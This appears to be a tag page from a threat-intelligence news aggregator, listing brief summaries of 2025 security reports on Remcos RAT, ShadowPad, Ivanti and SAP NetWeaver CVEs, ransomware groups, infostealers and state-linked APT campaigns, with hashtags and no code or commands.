Cybercriminals are increasingly leveraging PowerShell-based loaders and proxy execution through mshta.exe to deploy the stealthy Remcos RAT, which operates entirely in memory to evade traditional defenses. This malware uses advanced persistence, evasion, and data theft techniques, highlighting the importance of behavioral detection and robust endpoint protection. #Remcos #PowerShellLoader #MSHTA #Rmc7SY4AX
Tag: EDR
Aquatic Panda is a Chinese state-sponsored cyberespionage group linked to the contractor i-Soon, focused on long-term intelligence gathering and surveillance of government, NGOs, academic, and ideological targets worldwide. Utilizing advanced modular malware like ShadowPad and stealthy techniques, the group operates within China’s broader cyber network alongside entities such as Winnti, driven by objectives of state surveillance and influence. #AquaticPanda #ChineseAPT #Cyberespionage #ShadowPad #iSoon #Winnti #MSS
Ivanti Endpoint Manager Mobile (EPMM) is affected by two chained vulnerabilities (CVE-2025-4427 and CVE-2025-4428) that allow unauthenticated remote code execution. These flaws are being actively exploited in-the-wild, posing a critical risk despite their individual CVSS scores. #IvantiEPMM #RCE #Vulnerabilities #Cybersecurity
This article details a targeted ransomware attack by the 3AM group using sophisticated social engineering via email bombing and Microsoft Teams vishing to gain remote access. The attackers deployed a QEMU-based backdoor, evaded endpoint protections, stole data, and attempted but largely failed to encrypt systems due to strong defenses like multifactor authentication and Sophos XDR. #3AMRansomware #Vishing #QEMUBackdoor #SophosXDR #MultifactorAuthentication
Nitrogen is a sophisticated ransomware strain that targets the financial, manufacturing, and technology sectors across North America and the UK, employing advanced evasion and persistence tactics. Experts warn that its evolving methods pose a significant threat to organizations, emphasizing the importance of threat intelligence and real-time analysis tools like ANY.RUN. #NitrogenRansomware…
PupkinStealer is a newly discovered .NET-based information-stealing malware designed to extract browser passwords, app session tokens, and files, exfiltrating data through Telegram’s Bot API. Originating from Russian-speaking cybercriminal groups, it targets Windows users indiscriminately and emphasizes rapid data theft without persistence mechanisms. #PupkinStealer #InfoStealer #Telegram #WindowsMalware #Cybercrime
SideWinder APT has launched a sophisticated cyber espionage campaign targeting government institutions in Sri Lanka, Bangladesh, and Pakistan by exploiting legacy Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882. The attackers use geofenced spear phishing, multistage loaders, and DLL sideloading to deliver StealerBot, a credential stealer designed for persistent access and data exfiltration. #SideWinder #APT #CVE2017-0199 #CVE2017-11882 #StealerBot #CyberEspionage #SriLanka #Bangladesh #Pakistan
Chinese nation-state APT groups exploited an unauthenticated file upload vulnerability (CVE-2025-31324) in SAP NetWeaver Visual Composer to gain persistent remote access to critical infrastructure networks globally. This wide-ranging campaign targeted essential services and government entities across multiple countries, using sophisticated webshells and multi-stage malware to maintain stealthy control and enable espionage. #APT, #SAPNetWeaver, #CVE202531324, #China, #CriticalInfrastructure, #Webshell, #Malware
DTEX has updated its Insider Threat Advisory highlighting evolved tactics used by DPRK IT workers to infiltrate organizations globally and evade detection, particularly through behavioral and technological indicators. These activities impact corporate insider threat detection, remote access infrastructure, and recruitment systems worldwide. #DPRK #InsiderThreat #RemoteAccess
VanHelsing ransomware is a high-severity threat targeting Microsoft Windows systems by encrypting files and demanding ransom payments for decryption. This ransomware family uses multiple file extensions and maintains active data leak sites to pressure victims, significantly impacting affected organizations. #MicrosoftWindows #VanHelsing
A recent leak of the LockBit ransomware group’s internal database has exposed detailed information about their operations, affiliates, targets, and payment methods. This breach could significantly impact the group’s future activities and law enforcement efforts. Affected: LockBit ransomware group, victim organizations, cybersecurity and law enforcement agencies…
LeakedData, emerging in December 2024, is the operational front of the Silent Ransom Group, a Conti ransomware offshoot that shifted from ransomware encryption to targeted data extortion using social engineering and legitimate remote management tools. The group primarily targets U.S.-based law firms, insurance providers, and financial services companies to maximize extortion leverage by threatening data leaks. #SilentRansomGroup #LeakedData #ContiRansomware
APT37 conducted a spear phishing campaign disguised as invitations to South Korean national security events, delivering malicious LNK files via Dropbox to execute fileless RoKRAT malware. This campaign exploited trusted cloud services for command and control (C2), challenging detection efforts and impacting endpoint security defenses. #APT37 #RoKRAT #Dropbox #EndpointSecurity
Windows includes the Ancillary Function Driver (AFD) kernel component, which underpins networking sockets but has lacked comprehensive public API definitions until recently. New research and published definitions enhance forensic and troubleshooting capabilities for AFD sockets by exposing detailed socket information at the kernel level. #Windows #AncillaryFunctionDriver #AFD #SystemInformer
Ransomware has become a highly advanced and coordinated threat, exploiting legitimate IT tools and innovative business models like RaaS to increase attack frequency and reach. Building a comprehensive backup and recovery strategy is essential for organizations to withstand and quickly recover from such attacks. Affected: Organizations, IT systems, backup infrastructure…